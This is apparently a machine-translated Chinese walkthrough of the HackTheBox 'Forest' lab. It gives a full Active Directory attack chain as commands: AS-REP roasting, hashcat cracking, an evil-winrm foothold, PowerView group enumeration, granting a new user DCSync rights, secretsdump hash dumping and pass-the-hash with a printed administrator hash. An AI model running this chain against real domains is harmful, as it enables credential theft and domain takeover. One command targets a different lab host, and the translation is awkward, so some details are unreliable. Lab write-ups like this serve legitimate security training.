扫描
枚举特定于域控制器的服务
枚举将从尝试从DNS服务器获取区域传输开始。
dig @10.10.10.161 AXFR htb.local
区域传输尝试不成功,因此接下来我将继续讨论kerberos服务。
针对Kerberos服务,我在不提供用户名的情况下测试了快速的No-Preauth成功。
GetNPUsers.py active.htb/ -dc-ip 10.10.10.100
轰!看起来一个长镜头是成功的,我能够揭示一个AS-REP可烤服务帐户:svc-alfresco
通常使用AS-REP烘焙,您需要一个有效的用户名。当涉及到AD枚举时,有三个检查阶段:无凭证(匿名访问)、无密码的有效用户名,然后是有效凭证集(用户名+密码)。
AS-REP烘焙服务帐户svc-alfresco
现在我可以请求用户的哈希并破解它!
GetNPUsers.py htb.local/ -dc-ip 10.10.10.161 -request
太神奇了!服务帐户AS-REP哈希已转储!
由于这不是一个标准的NTLM散列,我需要破解它,所以我完整地复制了它,并将其粘贴到一个名为hash.txt的文件中 。
使用Hashcat破解AS-REP哈希
现在散列在文件中并准备破解,我首先使用 hashcat 找到此散列类型的破解模式,然后继续破解它。
hashcat -h | grep -i "AS-REP"
hashcat -m 18200 ./hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
在短短的10秒钟内,密码被破解了。
检查输出文件,我恢复了svc-alfresco的密码。
svc-alfresco : s3rvice
太好了!我能够在早期获得凭证,现在我可以使用到Kerberos、LDAP、SMB和WinRM等服务的经过身份验证的会话执行更深入的枚举
作为svc-alfresco获得立足点
首先,我检查了这些凭证是否有效,以及它们可以使用crackmapexec访问哪些服务
crackmapexec smb 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
通过SMB进行测试,确认这些凭据有效;但是,我没有看到Pwn 3D!消息,指示可以通过此服务执行命令。
接下来,我检查了WinRM访问,果然我得到了Pwn 3d!留言
crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
这意味着我将不再需要在外部枚举其他服务,因为我发现了一个快速的胜利,现在我可以使用evil-winrm获得立足点
evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
攻击后的枚举和权限提升
就像初始枚举一样,因为这是一个域控制器,所以开发后枚举将分为两个部分:域特定枚举和常规枚举。
从特定于域的枚举开始,我使用以下命令获取了所有域用户的列表:
net user /domain
列出了相当多的域用户,因此我复制了完整的列表并将其添加到名为user.txt的文件中,然后使用Linux-fu对其进行清理并将其放入名为users.txt的新文件中
cat user.txt | tr ' ' '\n' | sed -r '/^\s*$/d' > users.txt
接下来,我检查了域管理员是谁。
net groups "Domain Admins" /domain
唯一的DA是内置的域管理员帐户。
现在我已经收集了一些关于域用户的信息,我想枚举这些组。
net group /domain
这里有很多非默认组;但是,有一些比较突出,例如Exchange组、特权IT帐户、服务帐户和测试。
另外,我想检查“本地组”,因为它们在加入域时成为“域本地组”,尤其是DC上的组。
net localgroup
上面我只强调了几个“域本地组”,你不会找到,比方说,一个非域加入Windows机器。
查找指向“Account Operators”组的嵌套组
不幸的是,如果其中任何一个是嵌套的组,我将无法使用net命令进行区分。即使我检查我的当前用户,它也只会显示该用户是其直接成员的组。
net user svc-alfresco /domain
这里显示当前用户是ServiceAccounts组的一部分;但是,它们可以是嵌套了“服务帐户”组的多个组的成员。
由于内置命令存在一些限制,我将使用PowerView.ps1深入研究组。
使用PowerView.ps1枚举组
在获取PowerView.ps1的副本后,我将其移动到工作目录。回到目标上,我移动到C:\Windows\Temp文件夹来安装商店。
evil-winrm的一个很好的特性是它有一个内置的上传功能,所以我利用它将PowerView.ps1上传到目标上,如下所示:
upload /opt/hackthebox/Forest/PowerView.ps1
接下来,我使用dot-sourcing将脚本导入到当前会话中。
. .\PowerView.ps1
导入后,我可以使用菜单命令检查与此脚本关联的所有可能函数。
加载PowerView后,首先要查找的是当前用户所属的所有组。
Get-DomainGroup -MemberIdentity 'svc-alfresco' | select samaccountname
酷!这显示了当前用户是3个组的一部分,但我可以在这里看到“特权IT帐户”,这是我在使用net user命令时没有看到的。这意味着该组可能是嵌套的。
接下来,我想深入每个组,找到与每个组关联的所有嵌套组。
Get-DomainGroup 'Service Accounts' | select samaccountname,memberof
在这里我找到了第一个嵌套组。这表示“服务帐户”组中的所有用户也是“特权IT帐户”组的成员。
现在我找到了这个嵌套的组,我想检查这个组是否也是嵌套的。
Get-DomainGroup 'Privileged IT Accounts' | select samaccountname,memberof
更多的巢!这告诉我,“Privileged IT Accounts”组中的所有用户都是“Account Operators”组的一部分。
Account Operators组实际上是一个域本地组。这就是为什么它没有显示在域组列表中的原因。
由于帐户操作员是一个本地组,很可能我已经达到了终点。
Get-DomainGroup 'Account Operators' | select samaccountname,memberof
这证实了它。此组不是任何其他组的成员。
svc-alfresco >> Service Accounts >> Privileged IT Accounts >> Account Operators
这实际上是在同一个域中嵌套的最佳实践,应该是:用户/计算机>>全局组>>域本地组
了解帐户操作员组
由于我到达了嵌套路径的末尾,我决定在“帐户操作员”组上运行相同的命令,只是这次我不会选择特定的字段,以便我可以获得有关该组的一些信息。
Get-DomainGroup 'Account Operators'
这很有趣,因为它表明我可以管理用户和组。
帐户操作员组向用户赠款有限的帐户创建权限。此组的成员可以创建和修改大多数类型的帐户,包括用户、本地组和全局组的帐户。组成员可以在本地登录到域控制器。
帐户操作员组的成员不能管理管理员用户帐户、管理员的用户帐户或 管理员、 服务器操作员、 帐户操作员、 备份操作员或打印操作员组。此组的成员不能修改用户权限。
根据上面的信息,看起来我应该能够创建一个用户并将其添加到一个组,只要它不是上面列出的组之一。
寻找有价值的ACE
- GenericAll – full rights to the object (add users to a group or reset user’s password)
GenericAll -对象的完全权限(将用户添加到组或重置用户的密码) - GenericWrite – update object’s attributes (i.e logon script)
GenericWrite -更新对象的属性(即登录脚本) - WriteOwner – change object owner to attacker controlled user take over the object
WriteOwner -将对象所有者更改为攻击者控制的用户接管对象 - WriteDACL – modify object’s ACEs and give attacker full control right over the object
WriteDACL -修改对象的ACE并给予攻击者对对象的完全控制权 - AllExtendedRights – ability to add user to a group or reset password
AllExtendedRights -将用户添加到组或重置密码的能力 - ForceChangePassword – ability to change user’s password
ForceChangePassword -更改用户密码的能力 - Self (Self-Membership) – ability to add yourself to a group
Self(Self-Membership)-将自己添加到组的能力
在这个列表中,最有趣的ACE是GenericAll,所以我们可以通过以下命令开始搜索具有此权限的所有组:
$ADSI=[ADSI]"LDAP://DC=htb,DC=local"
$ADSI.psbase.get_ObjectSecurity().getAccessRules($true, $true,[system.security.principal.NtAccount]) | Where-Object {$_.IdentityReference -like "*"} | Where-Object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.AccessControlType -like "*Allow*"}
我对前两个结果不感兴趣,因为我不能修改任何管理员帐户(包括SYSTEM),也不能修改任何管理组。“组织管理”组是Exchange的管理组,这意味着“Exchange受信任的子系统”对我来说最突出。
在Exchange受信任子系统组上滥用GenericAll权限
由于我是帐户操作员组的一员,我应该能够创建一个帐户并将该帐户添加到“Exchange可信系统”组。由于这个组具有GenericAll权限,我应该能够将新创建的用户添加到这个组,然后给予他们All、ResetPassword、WriteMembers或DCSync权限
net user /add pwnt P@ssw0rd /domain
net group /add 'Exchange Trusted Subsystem' pwnt /domain
完美,现在我想尝试授予用户“DCSync”权利与以下:
$SecPassword = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('HTB.local\pwnt', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity pwnt -Rights DCSync
太好了!它看起来像这一切工作,因为我没有得到任何错误!
DCSync攻击使用Microsoft Directory Replication Service Remote Protocol(MS-DRSR)中的命令伪装成域控制器(DC),以便从另一个DC获取用户凭据。
使用DCSync攻击转储DC中的所有哈希
现在是揭晓的时刻。如果一切按预期进行,我应该能够使用转储DC中的所有散列secretsdump.py,如下所示:
secretsdump.py htb.local/pwnt:'P@ssw0rd'@10.10.10.161
轰!成功了!!现在我可以简单地使用管理员散列执行传递散列攻击并获得标志!
最初我先在“组织管理”组上测试了与上面相同的步骤,看起来很有效...但是当我尝试使用secretsdump.py时,它不起作用。
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6